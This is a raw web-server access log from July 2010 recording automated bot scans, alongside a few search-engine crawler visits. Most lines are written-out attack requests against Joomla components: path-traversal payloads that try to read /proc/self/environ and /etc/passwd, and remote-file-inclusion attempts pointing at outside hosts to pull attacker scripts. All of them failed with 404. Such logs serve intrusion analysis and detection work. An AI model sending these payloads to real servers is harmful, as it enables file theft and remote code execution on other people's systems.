87.98.217.83 - - [27/Jul/2010:04:52:27 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:04:52:27 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
74.55.73.74 - - [27/Jul/2010:04:55:05 +0200] "GET /become_editor.php?theme_path=http://porschesource.com/logs/myid.jpg? HTTP/1.1" 404 304 "-" "libwww-perl/5.810"
146.83.237.120 - - [27/Jul/2010:04:55:24 +0200] "GET /logs/access_log//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.79"
146.83.237.120 - - [27/Jul/2010:04:55:24 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
146.83.237.120 - - [27/Jul/2010:04:55:24 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
146.83.237.120 - - [27/Jul/2010:04:55:24 +0200] "GET /logs/access_log//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.79"
146.83.237.120 - - [27/Jul/2010:04:55:25 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
146.83.237.120 - - [27/Jul/2010:04:55:25 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
146.83.237.120 - - [27/Jul/2010:04:55:26 +0200] "GET /logs/access_log//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.79"
146.83.237.120 - - [27/Jul/2010:04:55:26 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
146.83.237.120 - - [27/Jul/2010:04:55:26 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
81.21.78.22 - - [27/Jul/2010:04:56:22 +0200] "GET /become_editor.php?theme_path=http://porschesource.com/logs/myid.jpg? HTTP/1.1" 404 304 "-" "libwww-perl/5.803"
146.83.237.120 - - [27/Jul/2010:04:57:56 +0200] "GET /logs/access_log//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.79"
146.83.237.120 - - [27/Jul/2010:04:57:56 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
146.83.237.120 - - [27/Jul/2010:04:57:56 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
146.83.237.120 - - [27/Jul/2010:04:58:36 +0200] "GET /logs/access_log//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.79"
146.83.237.120 - - [27/Jul/2010:04:58:37 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
146.83.237.120 - - [27/Jul/2010:04:58:37 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
67.195.112.43 - - [27/Jul/2010:05:01:52 +0200] "GET /robots.txt HTTP/1.0" 404 297 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.43 - - [27/Jul/2010:05:01:52 +0200] "GET /logs/?C=S;O=A HTTP/1.0" 200 797 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
125.141.91.138 - - [27/Jul/2010:05:02:46 +0200] "GET /logs//components/com_rwcards//errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 327 "-" "Mozilla/5.0"
125.141.91.138 - - [27/Jul/2010:05:02:46 +0200] "GET /logs/access_log//components/com_rwcards//errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 338 "-" "Mozilla/5.0"
125.141.91.138 - - [27/Jul/2010:05:02:46 +0200] "GET //components/com_rwcards//errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 322 "-" "Mozilla/5.0"
125.141.91.138 - - [27/Jul/2010:05:03:53 +0200] "GET /logs//components/com_rwcards//errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 327 "-" "Mozilla/5.0"
125.141.91.138 - - [27/Jul/2010:05:03:53 +0200] "GET /logs/access_log//components/com_rwcards//errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 338 "-" "Mozilla/5.0"
125.141.91.138 - - [27/Jul/2010:05:03:54 +0200] "GET //components/com_rwcards//errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 322 "-" "Mozilla/5.0"
74.55.73.74 - - [27/Jul/2010:05:07:08 +0200] "GET /logs/error_log/become_editor.php?theme_path=http://porschesource.com/logs/myid.jpg? HTTP/1.1" 404 319 "-" "libwww-perl/5.810"
74.55.73.74 - - [27/Jul/2010:05:07:08 +0200] "GET /become_editor.php?theme_path=http://porschesource.com/logs/myid.jpg? HTTP/1.1" 404 304 "-" "libwww-perl/5.810"
74.55.73.74 - - [27/Jul/2010:05:07:08 +0200] "GET /logs/become_editor.php?theme_path=http://porschesource.com/logs/myid.jpg? HTTP/1.1" 404 309 "-" "libwww-perl/5.810"
74.55.73.74 - - [27/Jul/2010:05:08:39 +0200] "GET /logs/error_log/become_editor.php?theme_path=http://porschesource.com/logs/myid.jpg? HTTP/1.1" 404 319 "-" "libwww-perl/5.810"
74.55.73.74 - - [27/Jul/2010:05:08:40 +0200] "GET /become_editor.php?theme_path=http://porschesource.com/logs/myid.jpg? HTTP/1.1" 404 304 "-" "libwww-perl/5.810"
74.55.73.74 - - [27/Jul/2010:05:08:40 +0200] "GET /logs/become_editor.php?theme_path=http://porschesource.com/logs/myid.jpg? HTTP/1.1" 404 309 "-" "libwww-perl/5.810"
81.21.78.22 - - [27/Jul/2010:05:10:01 +0200] "GET /logs/error_log/become_editor.php?theme_path=http://porschesource.com/logs/myid.jpg? HTTP/1.1" 404 319 "-" "libwww-perl/5.803"
81.21.78.22 - - [27/Jul/2010:05:10:01 +0200] "GET /become_editor.php?theme_path=http://porschesource.com/logs/myid.jpg? HTTP/1.1" 404 304 "-" "libwww-perl/5.803"
81.21.78.22 - - [27/Jul/2010:05:10:01 +0200] "GET /logs/become_editor.php?theme_path=http://porschesource.com/logs/myid.jpg? HTTP/1.1" 404 309 "-" "libwww-perl/5.803"
67.195.112.43 - - [27/Jul/2010:05:13:19 +0200] "GET /logs/?C=N;O=A HTTP/1.0" 200 797 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.195.185.200 - - [27/Jul/2010:05:15:56 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:15:57 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:15:57 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:15:58 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:16:36 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:16:36 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:16:37 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:16:41 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:16:41 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:16:41 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:16:42 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:16:44 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:16:45 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:17:13 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:17:13 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:17:14 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:24:09 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:24:09 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:24:09 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:24:10 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:24:10 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:24:10 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:24:10 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:24:10 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:24:11 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:25:34 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:25:34 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:25:34 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:25:35 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:25:36 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:25:36 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:25:41 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:25:41 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:25:41 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:27:32 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:27:34 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
95.141.32.178 - - [27/Jul/2010:05:30:36 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:05:30:37 +0200] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:05:30:37 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:05:31:11 +0200] "GET //index.php?option=com_janews&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
217.195.185.200 - - [27/Jul/2010:05:37:48 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:37:48 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:37:49 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:37:57 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
119.192.145.144 - - [27/Jul/2010:05:38:01 +0200] "GET //index.php?option=com_janews&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
217.195.185.200 - - [27/Jul/2010:05:38:04 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:38:10 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:38:10 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:38:10 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
95.141.32.178 - - [27/Jul/2010:05:38:40 +0200] "GET /logs/access_log//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:05:38:40 +0200] "GET //index.php?option=com_janews&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:05:38:40 +0200] "GET /logs//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
67.195.112.43 - - [27/Jul/2010:05:43:02 +0200] "GET /logs/?C=D;O=A HTTP/1.0" 200 797 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.195.185.200 - - [27/Jul/2010:05:46:42 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:46:43 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:46:43 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:46:45 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:46:46 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:46:46 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
207.46.199.51 - - [27/Jul/2010:05:46:49 +0200] "GET /robots.txt HTTP/1.1" 404 297 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.51 - - [27/Jul/2010:05:49:02 +0200] "GET / HTTP/1.1" 200 560 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
219.240.36.36 - - [27/Jul/2010:05:54:08 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.65"
217.195.185.200 - - [27/Jul/2010:05:56:02 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:56:03 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:56:05 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:56:05 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:56:05 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
217.195.185.200 - - [27/Jul/2010:05:56:05 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
119.192.145.144 - - [27/Jul/2010:05:59:04 +0200] "GET /logs/access_log//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:05:59:05 +0200] "GET //index.php?option=com_janews&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:05:59:05 +0200] "GET /logs//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
